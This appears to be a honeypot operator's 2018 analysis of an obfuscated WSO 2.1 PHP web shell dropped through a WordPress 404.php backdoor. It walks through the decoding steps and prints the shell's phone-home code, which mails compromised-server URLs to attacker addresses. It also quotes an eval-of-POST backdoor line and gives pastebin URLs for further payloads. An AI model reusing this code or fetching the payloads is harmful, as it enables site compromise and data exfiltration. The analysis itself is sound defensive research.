2018-03-08
Obfuscated WSO version 2.1, an old favorite, this time with a little bit more complicated encoding than is common. The web shell itself is completely kinked, containing two phone-homes, and doing two downloads from pastebin.com, one of which is an email tool, the other is WSO 2.6 web shell.
This is complicated. it contains layers of malware.
58.44.44.33 has no DNS name.
58.44.44.33 belongs to Hunan Telecom, in Yueyan, Hunan
inetnum: 58.44.0.0 - 58.44.127.255
netname: CHINANET-HN-YY
country: CN
descr: CHINANET-HN Yueyang node network
descr: hunan Telecom
admin-c: CHY4-AP
tech-c: CH636-AP
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-CHINANET-HN
mnt-lower: MAINT-CHINANET-HN-YY
last-modified: 2008-09-04T07:03:41Z
role: CHINANET HuNan Yueyang
address: Dongmaoling telecom building,Yueyang,Hunanan 414000
country: CN
phone: +86 730 8235976
fax-no: +86 730 8235976
e-mail: abuse.yy@2118.com.cn
The HTTP requests ended up setting PHP HTTP_ACCEPT_LANGUAGE of zh-cn, which makes sense with respect to the IP address' physical location.
p0f3
says 58.44.44.33 runs "Windows 7 or 8":
[2018/03/08 02:07:50] mod=syn|cli=58.44.44.33/9326|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=13|params=none|raw_sig=4:115+13:0:1200:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0
The User Agent string of "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" seems to confirm that.
Downloaded to same 404.php
backdoor as
this recon malware,
except it used more POST parameters. This is a facet of the backdoor
just doing a PHP eval()
on the value of a specific POST parameter,
"@123". The attacker sent a string in "@123" that used POST parameters
named "z0", "z1" and "z2".
There's multiple threads of decoding, because of the multiply-compromised code. We start with only one file, but end up with many.
- Hand edit
58.44.44.33WqEH5ybsZB6qzsq9tL9VmwAAAAE.wso.scans
into filesz0
,z1
,z2
- Get
z0
decoded.- Hand edit
z0
to leave only Base64-encoded text - Invoke
base64 -d z0 > z0.1
- Add "<?php" to
z0.1
, pretty-print to getz0.2
.
- Hand edit
- Get
z1
decoded.- Hand edit
z
to leave only Base64-encoded text - Invoke
base64 -d z1 > z1.1
- File
z1.1
has a string in it: "SCRIPT_FILENAMEZ::/wew.php".
- Hand edit
- Get
z2
decoded.- Hand-edit
z0.2
, usingz1.1
andz2
contents, intodc1.php
- Invoke
php dc1.php
, which decodes the string fromz2
into filewew.php
- Hand-edit
- Pretty-print
wew.php
intowew
for readability. - Decode obfuscated phone home (second phone home)
- Extract lines 91, 92 from
wew
intoshell_data
- Hand-edit
shell_data
so that it prints instead of evals. - Invoke
php shell_data > sd1.php
- Hand-edit
sd1.php
to add "<?php" - Pretty-print
sd1.php
yieldingsd2.php
- Extract lines 91, 92 from
Relies on ancient 404.php
to evaluate code in POST parameter named
"@123":
@eval(base64_decode($_POST[z0]));
POST parameter "z0" ends up being a "dropper" that uses value of POST parameter "z1" as a file name, and value of POST parameter "z2" as the contents of that file name.
POST parameter z1 decoded to: SCRIPT_FILENAMEZ::/wew.php
which seems
wrong for both Linux and Windows machines. a directory
SCRIPT_FILENAMEZ::
would have to exist first, before
file_put_contents()
would function correctly. I don't think Windows
file names can have ':' or '/' characters in them. I suspect this would
cause the file_put_contents()
call to fail miserably.
PHP code in POST parameter "z0" uses a second form of encoding for the
contents of POST parameter "z1", 2-character representations of
hexadecimal values of the ASCII bytes. The decoding inserts '%'
characters every two characters of the encoded contents, then runs
PHP's urldecode()
builtin on each "%xx" style hex represenation.
File wew.php
is the final form of the code, I believe.
Had the attacker actually executed the dropper code (dc1.php
), it
would end up sending back a string like "->|1|<-" to the downloader.
If everything worked correctly. And it probably wouldn't.
I'm sorry this is complicated.
wew.php
really is WSO 2.1, plus a phone home to wildt00lz@gmail.com,
plus download of two files from pastebin.com,
wmw.php
and 2ww.php
, plus a second phone home to d0z_a@yahoo.com.
Holy cow, wew.php
is totally kinked.
The phone-homes get executed every time wew.php
runs, as does
a few lines of code that modify php.ini
to
have Safe Mode off, and to eliminate any
disabled functions.
Additionally, wew.php
sets a cookie that never gets referenced elsewhere:
@setcookie("wsog","orb",time()+3600*24*7);
Perhaps there's some other malware, when installed on the same web
site as wew.php
that uses this cookie.
Overall, wew.php
exhibits WSO's characteristic organization into
"action" functions, with dispatch to an action done with PHP's
call_user_func()
based on the value of a POST parameter named "a".
This phone home was just blatantly shoved in to the WSO 2.1 code. No de-obfuscating necessary.
$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@gmail.com', $_SERVER['SERVER_ADDR'], $body);
$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@hotmail.com', $_SERVER['SERVER_ADDR'], $body);
The email sent to wildt00lz@hotmail.com and wildt00lz@gmail.com would have an IP address of
the compromised web server as its "Subject:" line, and the body
would have a URL for the original back door, and the
directory in which the kinked WSO 2.1 file wew.php
ended up, something like:
Shell: http://www.stratigery.com/wp-content/themes/twentytwelve/404.php /var/www/html/wp-content/themes/twentytwelve
This would probably let the attacker guess at a URL for access to wew.php
wmw.php - from https://pastebin.com/raw/YDMtmcAr
Appears to be a stock LeafMailer, has comments but not the phone-home from an earlier LeafMailer.
2ww.php - from https://pastebin.com/raw/GUcxfLzm
The source code in 2ww.php
needs some cleanup to enhance
readability.
- Run de-obfuscator
over
2ww.php
yielding2ww.f1.php
- Hand edit
2ww.f1.php
- remove theeval('
and');
, un-escape the remaining single-quotes. - Run de-obfuscator over
2ww.f1.php
to get2ww.f2.php
I've seen some obfuscation like this before. The file 2ww.php
contains
obfuscated PHP, followed by a string of encoded text. Using fopen()
on itself via the __FILE__
feature of PHP, the obfuscated PHP
reads some of the string of encoded text, decodes it, and evals it.
Deobfuscating the mix of code and encoded code in 2ww.f2.php
is
iterative: figure out how far the file pointer from fopen()
is
in 2ww.php
(initially, the fread()
sets it to 0x50D = 1293),
determine how much of the encoded data to put into the decoding
function (first chunk, 0x1A8 = 424 bytes), and how far that
fread()
advances the file poiner.
x3.php
is the final decoder. It was easier to massage
a copy of 2ww.f2.php
(x3.php
) by doing throwaway intermediate
PHP programs from pieces of 2ww.php
, then incorporate the knowledge
gained into x3.php
.
Deobfuscated form of 2ww.php
is wso2.6.php
.
Ironically, most WSO 2.6 files out in the wild have the same
phone-home as the "second phone home" in the WSO 2.1 wew.php
file. 2ww.php
has had it removed.
The second phone home, from Decoding Step 6 above, ends up looking like this:
<?php
$visitcount = $HTTP_COOKIE_VARS["visits"];
if ($visitcount == "") {
$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web . $inj);
$body = "Boss, there was an injected target on {$target} by {$visitor}";
@mail("d0z_a@yahoo.com", "Fx29Shell http://{$target} by {$visitor}", "{$body}");
} else {
$visitcount;
}
setcookie("visits", $visitcount);
The first time a browser (the code uses HTTP cookies) accesses the
kinked WSO wew.php
, the compromised server (the host running my
WordPress honey pot) sends an email to "d0z_a@yahoo.com" with the URL
of wew.php
and the IP address of the browser. What a gold mine of
info. Oddly, the email will claim that WSO 2.1 is a Fx29Shell web
shell. I think this phone home code originates in Fx29Shell. Either the
original author of Fx29 put it in, or someone put it in a widely copied
version of Fx29. I've seen this phone home in other versions of WSO.
See my
malware-phylogeny
project for some additional detail.
Nothing turned up when I googled for "wildt00lz@gmail.com", or "d0z_a@yahoo.com". The addresses seem to have stayed off radar.